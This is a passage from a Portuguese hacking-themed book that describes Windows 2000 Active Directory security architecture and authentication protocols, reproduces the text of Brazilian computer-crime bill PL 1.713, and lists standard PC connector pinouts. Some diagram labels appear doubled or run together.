Domain Hierarchy: Domain TreeOrganizational Unit (OU) hierarchywithin a Domain

Users, Groups, Machines,Printers, etc.

OU

OU

Users

Figura 1. Estrutura hierárquica do Active Directory

Vantagens do Gerenciamento de Conta do Active Directory As vantagens da integração do gerenciamento de conta de segurança com o Active Directory são: • Contas para usuários, grupos e máquinas podem ser

organizadas em recipientes de diretório chamados unidades organizacionais (OUs). Um domínio pode ter qualquer número de OUs organizadas em um espaço de nome estruturado em árvores. Empresas podem organizar o espaço de nome para informação de conta para representar os departamentos e organizações na empresa. Contas de usuário, assim como OUs, são objetos de diretório que podem ser renomeados facilmente na árvore de domínio com as mudanças na organização.

• O Active Directory suporta um número muito maior de objetos de usuário (mais de 1 milhão de objetos) com melhor performance que o registry. O tamanho do domínio individual não está mais limitado a performance do repositório de conta de segurança. Uma árvore de domínios conectados pode suportar estruturas organizacionais bem maiores e complexas.

• Administração da informação de conta é melhorada com o uso

Terrorismo Tecnológico Aprenda Para Sobreviver

392

de ferramentas gráficas avançadas para gerenciamento do Active Directory, assim como através de suporte OLE DS para linguagens de script. Podem ser implementadas tarefas comuns com o uso de batch scripts para automatizar a administração.

• Serviços de replicação de diretório suportam múltiplas cópias de informação de conta, sendo que podem ser feitas atualizações em qualquer cópia, não somente no controlador de domínio primário designado. O suporte a Lightweight Directory Access Protocol (LDAP) e sincronização de diretório proporcionam os mecanismos para ligar o diretório Windows com outros diretórios da empresa.

Armazenar informação de conta de segurança no Active Directory significa que os usuários e grupos são representados como objetos no diretório. Acesso de leitura e escrita aos objetos no diretório pode ser dado ao objeto como um todo, ou para propriedades individuais do objeto. Administradores possuem controle refinado sobre quem pode atualizar informação de usuário e de grupo. Por exemplo, um grupo de operadores de Telecom pode receber o acesso de escrita somente para propriedades de conta de usuário relacionadas a equipamento telefônico do escritório, sem a necessidade de receberem privilégios completos de Conta Operador ou Administrador. O conceito de um grupo também é simplificado porque grupos locais e globais são representados por objetos de grupo no diretório. Interfaces de programação existentes para acesso a grupo local ainda são suportadas para compatibilidade completa com o passado. Entretanto, grupos definidos no diretório podem ser usados para controle de acesso em todo o domínio, a recursos ou somente para propósitos de administração local no controlador de domínio.

Relacionamento entre Diretório e Serviços de Segurança Existe uma relação fundamental entre o Active Directory e os Serviços de segurança integrados no sistema operacional Windows 2000. O Active Directory armazena informação de política de segurança de domínio—tais como restrições de senha a todo o domínio e privilégios de acesso ao sistema—que possuem influência direta no uso do sistema. Objetos relacionados a segurança no diretório devem ser administrados de maneira segura para evitar

Terrorismo Tecnológico Aprenda Para Sobreviver

393

alterações não autorizadas que afetam a segurança geral do sistema. O sistema operacional Windows 2000 implementa modelo de segurança baseado em objeto e controle de acesso para todos os objetos no Active Directory. Todo objeto no Active Directory possui um descritor de segurança único que define permissões de acesso necessárias para ler ou atualizar as propriedades do objeto. O diagrama abaixo mostra o relacionamento fundamental entre o Active Directory e os serviços de segurança do sistema operacional.

Active DirectoryStores security policyand accountinformation

Operating systemImplements securitymodel on all objectsTrusts informationstored securely in thedirectory

Active Directory

Windows 2000 Server

Directory and Security Services

Figura 2. Relacionamento entre o Active Directory e os serviços de Segurança

O Active Directory usa imitação e verificação de acesso Windows 2000 para determinar se um cliente Active Directory pode ler ou atualizar o objeto desejado. Isto significa que o cliente LDAP pede ao diretório que acione o sistema operacional para reforçar controle de acesso, ao invés do próprio Active Directory ter que tomar decisões de controle de acesso. O modelo de segurança do Windows 2000 proporciona uma implementação unificada e consistente de controle de acesso a todos os recursos de domínio, baseado na participação em grupo.

Terrorismo Tecnológico Aprenda Para Sobreviver

394

Componentes de segurança do Windows 2000 podem confirmar a informação relacionada a segurança armazenada no diretório. Por exemplo, o serviço de autenticação do Windows 2000 armazena informação de senha encriptada em uma porção segura do diretório de objetos de usuário. O sistema operacional confirma que esta informação de política de segurança está armazenada de maneira segura e que as restrições de conta ou participação em grupo não são alteradas por ninguém sem acesso autorizado. Em adição, informação de política de segurança para gerenciamento geral de domínio é mantida no diretório. Esta relação fundamental da Segurança e o Active Directory é atingida somente através da completa integração do diretório com o sistema operacional Windows 2000, e não está disponível de outra forma.

Relações de Confiança de Domínio Domínios do Windows 2000 podem ser organizados em uma árvore hierárquica de domínio. As relações de confiança entre domínios permitem que usuários sem contas definidas no domínio, sejam autenticados por servidores de recursos em outro domínio. No Windows NT 4.0 e em versões anteriores, relações de confiança interdomínios são definidas por contas de domínio relações de confiança em uma viaentre controladores de domínio. O gerenciamento de relações de confiança entre domínios de contas e domínios de recursos em uma rede grande é uma tarefa complexa. O Active Directory suporta duas formas de relações de confiança: • Relações de confiança em uma via explícitas a domínios

Windows NT 4.0. • Relações de confiança em duas vias transitivas entre domínios

que são parte da árvore de domínio do Windows 2000. O diagrama abaixo mostra os dois estilos de relação de confiança.

Terrorismo Tecnológico Aprenda Para Sobreviver

395

Domain

Domain Domain

Domain

Domain

DownlevelDomain

Explicit NT4-style Trusts

Microsoft.Com

FarEast. Microsoft. Com

Kerberos Trust

Europe. Microsoft. Com

Domain Trust Relationships

Figura 3. Relações de confiançade domínios

Confianças transitivas entre domínios simplifica o gerenciamento de contas confiávis interdomínios. Domínios que são membros da árvore de domínio definem uma relação de confiança em duas vias com o domínio pai na árvore. Todos os domínios implicitamente confirmam outros domínios na árvore. Se existem domínios específicos que não querem relação de confiança em duas vias, contas de relações de confiança em uma via explícitas podem ser definidas. Para organizações com múltiplos domínios, o número geral de relações de confiança em uma via explícitos é reduzido de maneira significativa.

Delegação de Administração Delegação de administração é uma ferramenta de valor para as organizações confinarem a administração de segurança para aplicação somente em subconjuntos definidos do domínio inteiro da organização. O requisito importante é conceder direitos para administrar um pequeno conjunto de usuários ou grupos nas suas áreas de responsabilidade e, ao mesmo tempo, não dar permissões para contas de gerenciamento em outras partes da organização. Delegação de responsabilidade para criar usuários ou grupos é

Terrorismo Tecnológico Aprenda Para Sobreviver

396

definida no nível da unidade organizacional (OU), ou container, onde as contas são criadas. Administradores de grupo para uma unidade organizacional não possuem necessariamente a habilidade de criar e gerenciar contas para outra unidade organizacional em um domínio. Entretanto, configurações de política para todo o domínio e direitos de acesso definidos em níveis superiores na árvores de diretório podem ser aplicados usando herança de direitos de acesso. Há três maneiras de definir a delegação de responsabilidades de administração: • Delegar permissões para alterar propriedades em um recipente

particular, tal como o LocalDomainPolicies do próprio objeto de domínio.

• Delegar permissões para criar e deletar objetos filho de um tipo específico embaixo de uma OU, tal como Usuários, Grupos ou Impressoras.

• Delegar permissões para atualizar propriedades específicas em objetos filho de um tipo específicos embaixo de uma OU; por exemplo o direito de configurar senhas em objetos Usuário.

A interface de usuário do Directory Service Administration facilita a visualização de informação delegada definida para recipientes. Também é fácil adicionar novas delegações de permissões, através da seleção de para quem você deseja delegar permissão, e a escolha de quais permissões eles precisam. A integração do repositório de contas de segurança com o Active Directory proporciona benefícios reais para administrar uma empresa. Performance, facilidade de administração e escalabilidade para grandes organizações são o resultado direto. Empresas baseadas na Internet podem usar árvores de domínio e OUs hierárquicas para organizar contas para parceiros de negócio, clientes assíduos ou fornecedores com direitos de acesso específicos aos seus sistemas.

Direitos de Acesso Refinado Grandes organizações dependem tipicamente de muitos indivíduos ou grupos para garantir e gerenciar a infraestrutura de conta de rede. Eles precisam da habilidade de conceder direitos de acesso a operações específicas—tais como limpar senhas de usuário ou desabilitar contas—para grupos específicos sem conceder

Terrorismo Tecnológico Aprenda Para Sobreviver

397

permissão de criar novas contas ou alterar outras propriedades de contas de usuário. A arquitetura de segurança para objetos do Active Directory usa descritores de segurança do Windows 2000 para controlar o acesso a objetos. Cada objeto no diretório possui um descritor de segurança único. A Lista de Controle de Acesso (ACL) no descritor de segurança é uma lista de entradas que concedem ou negam direitos de acesso específico a usuários ou grupos. Direitos de acesso podem ser concedidos ou negados com níveis de escopo diferentes no objeto. Direitos de acesso podem ser definidos em qualquer um dos seguintes níveis: • Aplicar ao objeto como um todo, que significa a aplicação a todas

as propriedades do objeto. • Aplicar a um grupo de propriedades definidas por conjuntos de

propriedade no objeto. • Aplicar a uma propriedade individual do objeto. Conceder acesso uniforme de leitura/escrita a todas as propriedades de um objeto é a permissão de acesso padrão para o criador do objeto. Conceder ou negar permissões de acesso a objeto a um conjunto de propriedades, é uma maneira conveniente de definir permissões a um grupo de propriedades relacionadas. O agrupamento de propriedades é definido pelo atributo de conjunto de propriedades de uma propriedades no esquema. A relação do conjunto de propriedades pode ser customizada através da alteração do esquema. Finalmente, a definição de direitos de acesso em um nível por propriedade proporciona o mais alto nível de granularidade de permissões. Definição de acesso por propriedade está disponível em todos os objetos no Active Directory. Objetos de recipente no diretório também suportam acesso refinado com respeito a quem possui permissões para criar objetos filho e quais tipos de objeto filho eles podem criar. Por exemplo, o controle de acesso definido em uma unidade organizacional (OU) pode definir quem pode criar objetos Usuário (contas) neste container. Outra entrada no controle de acesso para a OU pode definir quem pode criar objetos Impressora. Controle de acesso refinado nos recipientes do diretório é uma maneira efetiva de manter a organização do espaço de nomes do diretório. Uma nova implementação do Editor de Lista de Controle de Acesso

Terrorismo Tecnológico Aprenda Para Sobreviver

398

(ACL), o controle de diálogo comum para visualização ou alteração de permissões de segurança de objeto, proporciona uma interface fácil de usar para a definição de direitos de acesso para objetos do Active Directory, através de conjunto de propriedades ou propriedades individuais. O Editor ACL também suporta a definição de direitos de acesso herdados em objetos de container que são válidos para todos os sub-objetos naquela porção da árvore de diretório.

Herança de Direitos de Acesso Herança de direitos de acesso refere-se a como a informação de controle de acesso definida em recipientes de mais alto nível do diretório, se espalha para subrecipientes e objetos folha. Geralmente há dois modelos para a implementação de herança de direitos de acesso: herança dinâmica e estática. Herança dinâmica determina os direitos de acesso efetivos a um objeto através da avaliação das permissões definidas explicitamente no objeto e das permissões definidas para todos os objetos pai no diretório. Isto permite flexibilidade para alterar o controle de acesso em porções da árvore de diretório através de alterações específicas no container que afetam automaticamente todos os subrecipientes e objetos folha. O custo desta flexibilidade é o custo de performance para avaliar direitos de acesso efetivos na hora que um cliente requisita uma operação de leitura/escrita em um objeto de diretório específico. Windows 2000 implementa uma forma estática de herança de direitos de acesso, referenciada como herança Create Time. Pode ser definida a informação de controle de acesso que se espalha para objetos filho do container. Quando o objeto filho é criado, os direitos de herança do recipente são misturados aos direitos de acesso padrão no novo objeto. Quaisquer mudanças nos direitos de acesso herdados em níveis superiores da árvore devem ser propagadas para todos os objetos filho afetados. Novos direitos de acesso herdados são propagados pelo Active Directory para os objetos aos quais eles se aplicam, baseado em opções para como os novos direitos são definidos. Performance para verificação de controle de acesso é bem rápida com o uso do modelo estático de herança de direitos de acesso. O sistema operacional é projetado para otimizar verificações de acesso, operações necessárias e freqüentes, não somente para o

Terrorismo Tecnológico Aprenda Para Sobreviver

399

objeto de diretório, mas também para os arquivos de sistema e todos os outros objetos de sistema do Windows 2000. Windows 2000 suporta múltiplos protocolos de segurança de rede porque cada protocolo proporciona compatibilidade para clientes existentes, mecanismos de segurança mais efetivos ou funcionalidades de interoperabilidade para redes heterogêneas como a Internet. Há muitos protocolos de autenticação nas redes corporativas atualmente, e a arquitetura Windows 2000 não limita quais protocolos podem ser suportados. Um protocolo de segurança que atenda todas as necessidades deveria ser mais simples, mas as configurações de redes, de pequenas empresas a provedores de conteúdo Internet de larga escala, não compartilham os mesmos requisitos de segurança. Os clientes precisam poder escolher como integrar nova tecnologia de segurança, tal como senhas dinâmicas ou criptografia de chave pública, nos seus ambientes computacionais. Windows 2000 é projetado para suportar múltiplos protocolos de segurança, um elemento essencial para o ambiente computacional distribuído de hoje. Usando APIs de segurança Win32® de propósito geral, o sistema operacional isola as aplicações suportadas dos detalhes dos diferentes protocolos de segurança disponíveis. Interfaces de aplicação de mais alto nível proporcionada por RPC e DCOM Autenticados proporciona abstrações baseadas em parâmetros de interface para usar serviços de segurança. A infraestrutura de segurança do Windows 2000 suporta estes protocolos primários de segurança: • O protocolo de autenticação do Windows NT LAN Manager

(NTLM) é usado pelo Windows NT 4.0 e versões anteriores do Windows NT. NTLM continuará a ser suportado e usado para autenticação de rede pass-through, acesso de arquivo remoto e conexões RPC autenticadas a versões anteriores do Windows NT.

• O protocolo de autenticação Kerberos Versão 5 substitui o NTLM como o protocolo de segurança primário para acesso a recursos nos domínios Windows 2000. O protocolo de autenticação Kerberos é um padrão de indústria maduro que possui vantagens

Terrorismo Tecnológico Aprenda Para Sobreviver

400

para autenticação de rede Windows. Alguns dos benefícios do protocolo Kerberos são autenticação mútua do cliente e servidor, carga de servidor reduzida durante o estabelecimento de conexão, e suporte a delegação de autorização de clientes para servidores através do uso de mecanismos proxy.

• Distributed Password Authentication (DPA) é o protocolo de autenticação secreto compartilhado usado por algumas das maiores organizações da Internet, tais como a MSN e CompuServe. Este protocolo de autenticação faz parte dos serviços Microsoft Commercial Internet System (MCIS) e é projetado especificamente para usuários utilizarem a mesma senha Internet para conectar a qualquer número de sites Internet que são parte da mesma organização. Os servidores de conteúdo da Internet usam o serviço de autenticação MCIS como um serviço Internet de retaguarda, e os usuários podem conectar-se a múltiplos sites sem ter que redigitar suas senhas.

• Protocolos baseados em chave pública proporcionam privacidade e confiabilidade sobre a Internet. SSL é o padrão de fato atualmente para conexões entre browsers Internet e servidores de informação Internet. (Uma definição de protocolo padrão IETF baseada em SSL3 é conhecida correntemente por Transport Layer Security Protocol, ou TLS). Estes protocolos, que usam certificados de chave pública para autenticar clientes e servidores, dependem de uma infraestrutura de chave pública para amplo uso. Windows NT 4.0 proporciona serviços de segurança de canal seguro que implementam os protocolos SSL/PCT. Segurança no Windows 2000 possui suporte melhorado a protocolos de chave pública, o que está descrito a seguir neste documento.

Terrorismo Tecnológico Aprenda Para Sobreviver

401

Segurança corporativa depende da flexibilidade de usar os mecanismos de segurança certos quando necessário. Computação corporativa continuará a depender de uma ampla faixa de serviços de rede proporcionados por servidores remotos de arquivo e impressão, servidores de aplicações de negócio e dados, e data warehouse e ambientes de processamento transacionais. Suporte a múltiplos protocolos de segurança de rede permite que o Windows 2000 Professional e o Windows 2000 Server hospedem uma variedade de serviços de rede em adição as tecnologias baseadas na Internet. O diagrama seguinte mostra o suporte de arquitetura para múltiplos protocolos de segurança implementados no Windows 2000 usando

a Security Support Provider Interface (SSPI).

Secure RPCSecure RPC HTTPHTTP

SSPISSPI

Internet Explorer,Internet Explorer,Internet InformationInternet Information

ServerServer

NTLMNTLM KerberosKerberos SChannelSChannelSSL/TLSSSL/TLS

MSV1_0/MSV1_0/ SAM SAM

KDC/KDC/DirectoryDirectory

DCOMDCOMapplicationapplication

DPADPA

MembershipMembershipservicesservices

POP3, NNTPPOP3, NNTP

Mail,Mail,Chat,Chat,NewsNews

CIFS/SMBCIFS/SMB

RemoteRemotefilefile

Architecture For MultipleAuthentication Services

LDAPLDAP

DirectoryDirectoryenabled appsenabled appsusing ADSIusing ADSI

Figura 4. Arquitetura para Múltiplos Serviços de Autenticação

O Security Support Provider Interface é uma API Win32 de sistema usada por muitas aplicações e serviços de sistema—tais como o

Terrorismo Tecnológico Aprenda Para Sobreviver

402

Internet Explorer (IE) e Internet Information Server (IIS)—para isolar protocolos de nível aplicação de protocolos de segurança usados para autenticação de rede. Provedores de segurança usam credenciais diferentes para autenticar o usuário, ou certificados secretos compartilhados ou de chave pública. Os protocolos de segurança interagem com diferentes serviços de autenticação e armazéns de informação de conta. • O provedor de segurança NTLM usa o serviço de autenticação

MSV1_0 e o serviço NetLogon em um controlador de domínio, para autenticação cliente e informação de autorização.

• O provedor de segurança Kerberos conecta a um Key Distribution Center (KDC) online e ao armazém de conta Active Directory para tickets de sessão.

• DPA usa os serviços de segurança MCIS para autenticação membership e informação de acesso específica de servidor.

• Serviços de canal seguro são baseados em certificados de chave pública emitidos por Autoridades Certificadoras trusted; eles não exigem um servidor de autenticação online.

O S.O. Server possui varias vantagens pois pode trabalhar com protocolos múltiplos, e com chaves de critografia avançadas,

autentificador kerberus, entre outras tecnologias que ajudam a proteger a segurança do Sistema. Mas como vimos isso só não basta há de se pensar em todas as possibilidades possíveis de

ataques sendo nos cabso no servidor, nos micros dos usuários... Para informação mais recente sobre Windows 2000 e Windows NT Server, visite o Web site http://www.microsoft.com/ntserver e o Windows NT Server Fórum na Microsoft Network (GO WORD: MSNTS). Para mais informação sobre o Windows 2000 Active Directory, veja o white paper, Microsoft Windows NT Active Directory Technical

Terrorismo Tecnológico Aprenda Para Sobreviver

403

Summary. Informação adicional sobre segurança Microsoft Internet está disponível no Web site http://www.microsoft.com/security. Informação adicional sobre a arquitetura de segurança Windows NT, Security Support Provider Interface, CryptoAPI e APIs de segurança do Windows NT está disponível nas referências online para a Plataforma SDK Microsoft. As partes retiradas do site da Microsoft tiveram a Revisão Técnica por Giuliano Pasquale – Seminar Group Microsoft Brasil

Terrorismo Tecnológico Aprenda Para Sobreviver

404

CAPÍTULO XXI

LEIS – ESSAS QUE DEVERIAM VALER

Terrorismo Tecnológico Aprenda Para Sobreviver

405

Projeto de Lei 1.713 - Substitutivo - versão final - Dez Dispõe sobre os crimes de informática e dá outras providências

O Congresso Nacional decreta:

22.1 DOS PRINCÍPIOS QUE REGULAM A

PRESTAÇÃO DE SERVIÇO POR REDES DE COMPUTADORES

Art. 1º. O acesso, o processamento e a disseminação de informações através das redes de computadores devem estar a serviço do cidadão e da sociedade, respeitados os critérios de garantia dos direitos individuais e coletivos e de privacidade e segurança de pessoas físicas e jurídicas e da garantia de acesso às informações disseminadas pelos serviços da rede. Art. 2º. É livre a estruturação e o funcionamento das redes de computadores e seus serviços, ressalvadas as disposições específicas reguladas em lei. 22.2 DO USO DE INFORMAÇÕES DISPONÍVEIS EM COMPUTADORES OU REDES DE COMPUTADORES

Art. 3º. Para fins desta lei, entende-se por informações privadas aquelas relativas a pessoa física ou jurídica identificada ou identificável. Parágrafo Único: É identificável a pessoa cuja individuação não envolva custos ou prazos desproporcionados. Art. 4º. Ninguém será obrigado a fornecer informações sobre sua pessoa ou de terceiros, salvo nos casos previstos em lei. Art. 5º. A coleta, o processamento e a distribuição, com finalidades comerciais, de informações privadas ficam sujeitas à prévia aquiescência da

Terrorismo Tecnológico Aprenda Para Sobreviver

406

pessoa a que se referem, que poderá ser tornada sem efeito a qualquer momento, ressalvando-se o pagamento de indenizações a terceiros, quando couberem. § 1º. A toda pessoa cadastrada dar-se-á conhecimento das informações privadas armazenadas e das respectivas fontes. § 2º. Fica assegurado o direito à retificação de qualquer informação privada incorreta. § 3º. Salvo por disposição legal ou determinação judicial em contrário, nenhuma informação privada será mantida à revelia da pessoa a que se refere ou além do tempo previsto para a sua validade. § 4º. Qualquer pessoa, física ou jurídica, tem o direito de interpelar o proprietário de rede de computadores ou provedor de serviço para saber se mantém informações a seu respeito, e o respectivo teor. Art. 6º. Os serviços de informações ou de acesso a bancos de dados não distribuirão informações privadas referentes, direta ou indiretamente, a origem racial, opinião política, filosófica, religiosa ou de orientação sexual, e de filiação a qualquer entidade, pública ou privada, salvo autorização expressa do interessado. Art. 7º. O acesso de terceiros, não autorizados pelos respectivos interessados, a informações privadas mantidas em redes de computadores dependerá de prévia autorização judicial.

22.3 DOS CRIMES DE INFORMÁTICA Dano a dado ou programa de computador Art. 8º. Apagar, destruir, modificar ou de qualquer forma inutilizar, total ou parcialmente, dado ou programa de computador, de forma indevida ou não autorizada. Pena: detenção, de um a três anos e multa.

Terrorismo Tecnológico Aprenda Para Sobreviver

407

Parágrafo único. Se o crime é cometido: I - contra o interesse da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos; II - com considerável prejuízo para a vítima; III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro; IV - com abuso de confiança; V - por motivo fútil; VI - com o uso indevido de senha ou processo de identificação de terceiro; ou VII - com a utilização de qualquer outro meio fraudulento. Pena: detenção, de dois a quatro anos e multa Acesso indevido ou não autorizado Art. 9o. Obter acesso, indevido ou não autorizado, a computador ou rede de computadores. Pena: detenção, de seis meses a um ano e multa. Parágrafo primeiro. Na mesma pena incorre quem, sem autorização ou indevidamente, obtém, mantém ou fornece a terceiro qualquer meio de identificação ou acesso a computador ou rede de computadores. Parágrafo segundo. Se o crime é cometido: I - com acesso a computador ou rede de computadores da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos; II - com considerável prejuízo para a vítima;

Terrorismo Tecnológico Aprenda Para Sobreviver

408

III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro; IV - com abuso de confiança; V - por motivo fútil; VI - com o uso indevido de senha ou processo de identificação de terceiro; ou VII - com a utilização de qualquer outro meio fraudulento. Pena: detenção, de um a dois anos e multa. Alteração de senha ou mecanismo de acesso a programa de computador ou dados Art. 10o. Apagar, destruir, alterar, ou de qualquer forma inutilizar, senha ou qualquer outro mecanismo de acesso a computador, programa de computador ou dados, de forma indevida ou não autorizada. Pena: detenção, de um a dois anos e multa. Obtenção indevida ou não autorizada de dado ou instrução de computador Art. 11o. Obter, manter ou fornecer, sem autorização ou indevidamente, dado ou instrução de computador. Pena: detenção, de três meses a um ano e multa. Parágrafo único. Se o crime é cometido: I - com acesso a computador ou rede de computadores da União, Estado, Distrito Federal, Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

Terrorismo Tecnológico Aprenda Para Sobreviver

409

II - com considerável prejuízo para a vítima; III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro; IV - com abuso de confiança; V - por motivo fútil; VI - com o uso indevido de senha ou processo de identificação de terceiro; ou VII - com a utilização de qualquer outro meio fraudulento. Pena: detenção, de um a dois anos e multa Violação de segredo armazenado em computador, meio magnético de natureza magnética, optica ou similar Art. 12o. Obter segredos, de indústria ou comércio, ou informações pessoais armazenadas em computador, rede de computadores, meio eletrônico de natureza magnética, óptica ou similar, de forma indevida ou não autorizada. Pena: detenção, de um a três anos e multa. Criação, desenvolvimento ou inserção em computador de dados ou programa de computador com fins nocivos Art. 13o. Criar, desenvolver ou inserir, dado ou programa em computador ou rede de computadores, de forma indevida ou não autorizada, com a finalidade de apagar, destruir, inutilizar ou modificar dado ou programa de computador ou de qualquer forma dificultar ou impossibilitar, total ou parcialmente, a utilização de computador ou rede de computadores. Pena: reclusão, de um a quatro anos e multa.

Terrorismo Tecnológico Aprenda Para Sobreviver

410

Parágrafo único. Se o crime é cometido: I - contra a interesse da União, Estado, Distrito Federal. Município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos; II - com considerável prejuízo para a vítima; III - com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro; IV - com abuso de confiança; V - por motivo fútil; VI - com o uso indevido de senha ou processo de identificação de terceiro; ou VII - com a utilização de qualquer outro meio fraudulento. Pena: reclusão, de dois a seis anos e multa. Veiculação de pornografia através de rede de computadores Art. 14o. Oferecer serviço ou informação de caráter pornográfico, em rede de computadores, sem exibir, previamente, de forma facilmente visível e destacada, aviso sobre sua natureza, indicando o seu conteúdo e a inadequação para criança ou adolescentes. Pena: detenção, de um a três anos e multa.

22.4 DAS DISPOSIÇÕES FINAIS Art. 15o. Se qualquer dos crimes previstos nesta lei é práticado no exercício de atividade profissional ou funcional, a pena é aumentada de um sexto até a metade.

Terrorismo Tecnológico Aprenda Para Sobreviver

411

Art. 16o. Nos crimes definidos nesta lei somente se procede mediante representação do ofendido, salvo se cometidos contra o interesse da União, Estado, Distrito Federal Município, órgão ou entidade da administração direta ou indireta, empresa concessionária de serviços públicos, fundações instituídas ou mantidas pelo poder público, serviços sociais autônomos, instituições financeiras ou empresas que explorem ramo de atividade controlada pelo poder público, casos em que a ação é pública incondicionada. Art. 17o. Esta lei regula os crimes relativos à informática sem prejuízo das demais cominações previstas em outros diplomas legais. Art. 18o. Esta lei entra em vigor 30 (trinta) dias a contar da data de sua publicação. Art. 19o. Revogam-se todas as disposições em contrário.

Terrorismo Tecnológico Aprenda Para Sobreviver

412

Extras Uteis. Hackers sempre usam os conceitos físicos e lógicos da computação para conseguir o que querem. Como pheacker é preciso conhecer a parte de transmissão de dados, como os conectores e partes ligadas a energia elétrica nos pc´s. Como hacker é importante saber o que o micro está dizendo através de sons ou configurações de setup quando são feitos os vírus, então agora alguns guias muito úteis para vcs ☺

Terrorismo Tecnológico Aprenda Para Sobreviver

413

CONECTORES

CONECTORES(guia de conectores) COM1/COM2 RS-232 PORTA SERIAL ( DB-9 - DB25 ) CONECTOR DO BARRAMENTO ISA CONECTOR DO BARRAMENTO PCI ETHERNET 10/100 BASE-T ( RJ-45 ) FLOPPY DRIVE FONTE AT FONTE ATX GAME CONECTOR IDE HARD DRIVE KEYBOARD CONECTOR KEYBOARD E MOUSE CONECTOR ( MINI-DIN - PS2 ) PORTA PARALELA ( DB-25 ) SCSI USB VGA ( DB-15 )

IDE HARD DRIVE CONECTOR

PINO SINAL PINO SINAL 1 IDE RESET 2 GND 3 DATA 7 4 DATA 8 5 DATA 6 6 DATA 9 7 DATA 5 8 DATA 10 9 DATA 4 10 DATA 11 11 DATA 3 12 DATA 12 13 DATA 2 14 DATA 13 15 DATA 1 16 DATA 14 17 DATA 0 18 DATA 15 19 GND SINAL 20 N/C 21 N/C 22 GND

IDE MACHO

Terrorismo Tecnológico Aprenda Para Sobreviver

414

23 I/O WRITE 24 GND 25 I/O READ 26 GND 27 I/O CHANNEL

READY 28 N/C

29 HDACKO 30 GND 31 IRQ 14 32 IOCS16 33 ADDR 1 34 N/C 35 ADDR 0 36 ADDR 2 37 HARD DISK

SELECT 0 38 HARD DISK

SELECT 1 39 IDE ACTIVE 40 GND

FLOPPY DRIVE CONECTOR

PINO SINAL PINO SINAL 1 GND 2 DENSITY

SELECT 3 GND 4 N/C 5 GND 6 N/C 7 GND 8 INDEX 9 GND 10 MOTOR 0 11 GND 12 DRIVE

SELECT 1 13 GND 14 DRIVE

SELECT 0 15 GND 16 MOTOR 1 17 GND 18 DIRECTION 19 GND 20 STEP

FDC MACHO

Terrorismo Tecnológico Aprenda Para Sobreviver

415

21 GND 22 WRITE DATA

23 GND 24 WRITE GATE

25 GND 26 TRACK 0 27 GND 28 WRITE

PROTECT 29 GND 30 READ DATA31 GND 32 HEAD

SELECT 33 GND 34 DISK

CHANGE

FONTE AT

corpino SINAL

1 POWER GOOD -5V

2 +5V 3 +12V 4 -12V 5 GND 6 GND 7 GND 8 GND 9 -5V 10 +5V 11 +5V 12 +5V

Terrorismo Tecnológico Aprenda Para Sobreviver

416

FONTE ATX

+3.3V +3.3V -12V +3.3V GND GND PS/ON +5V GND GND GND +5V GND GND -5V POWER

OK +5V 5 VSB +5V

12V

PORTA PARALELA LPT1, LPT2 ( CONECTOR DB-25 )

PINO SINAL 1 Estrobe 2 D0 - Bit de dados 0 3 D1 - Bit de dados 1 4 D2 - Bit de dados 2 5 D3 - Bit de dados 3 6 D4 - Bit de dados 4 7 D5 - Bit de dados 5 8 D6 - Bit de dados 6 9 D7 - Bit de dados 7 10 ACK - Confirmação 11 BUSY - Ocupada 12 PE - Fim do papel 13 SLCT - Seleção

DB25 FÊMEA

Terrorismo Tecnológico Aprenda Para Sobreviver

417

14 AUTOFDXT - Avanço automático

15 Erro 16 INIT - Inicialização da

impressora 17 SLCTIN - Seleção de

entrada 18 a 25

0V -Terra

SCSI CONECTOR

PINO FUNCTION PINO FUNCTION1 SD+12 35 SD-12 2 SD+13 36 SD-13 3 SD+14 37 SD-14 4 SD+15 38 SD-15 5 SD+1 39 SD-1 6 SD+0 40 SD-0 7 SD+1 41 SD-1 8 SD+2 42 SD-2 9 SD+3 43 SD-3 10 SD+4 44 SD-4 11 SD+5 45 SD-5

SCSI FÊMEA

Terrorismo Tecnológico Aprenda Para Sobreviver

418

12 SD+6 46 SD-6 13 SD+7 47 SD-7 14 SDP+0 48 SD-0 15 GND 49 GND 16 DIFS 50 SENIN 17 TPWEX 51 TPWEX 18 TPWEX 52 TPWEX 19 N/C 53 NC 20 GND 54 GND 21 SATN+ 55 SATN- 22 GND 56 GND 23 SBSY+ 57 SBSY- 24 SACK+ 58 SACK- 25 SRST+ 59 SRST- 26 SMSG+ 60 SMSG- 27 SSEL+ 61 SSEL- 28 SCD+ 62 SCD- 29 SREQ+ 63 SREQ- 30 SIO+ 64 SIO- 31 SD+8 65 SD-8 32 SD+9 66 SD-9 33 SD+10 67 SD-10 34 SD+11 68 SD-11

Terrorismo Tecnológico Aprenda Para Sobreviver

419

USB CONECTOR

PINO SINAL 1 +5V 3 UV+(+DATA)2 UV- (-

DATA) 4 GND CHASSI GND

USB TIPO A FEMÊA

USB TIPO B MACHO

VGA CONECTOR ( HD -15 )

PINO SINAL 1 VERMELHO 2 VERDE 3 AZUL 4 N/C 5 GND 6 GND (Rrtorno

vermelho) 7 GND (Retorno

verde ) 8 GND (Retorno azul

) 9 N/C 10 GND 11 N/C 12 SDA 13 SINCRONISMO

HORIZONTAL 14 SINCRONISMO

VERTICAL 15 SCK

VGA FÊMEA

Terrorismo Tecnológico Aprenda Para Sobreviver

420

ETHERNET 10/100 BASE-T ( RJ-45 CONECTOR )

PINO SINAL 1 TRANSMITE

DADOS + 2 TRANSMITE

DADOS - 3 RECEBE

DADOS + 4 N/C 5 N/C 6 RECEBE

DADOS - 7 N/C 8 N/C

COM1/COM2 RS-232 PORTA SERIAL ( DB-9 - DB25 )

DB 9

DB 25

PINO

SINAL

PINO

1 CD - Detecção da portadora

8

2 RXD - Recepção de dados

3

3 TXD - Transmissão de dados

2

DB9 MACHO

4 DTR -Terminal de

20

DB25 MACHO

Terrorismo Tecnológico Aprenda Para Sobreviver

421

dados pronto

5 GND -Terra do sinal

7

6 DSR - Data Set pronto

6

7 RTS - Solicitação de dados

4

8 CTS - Pronto para enviar

5

9 RI - Indicador de chamadas

22

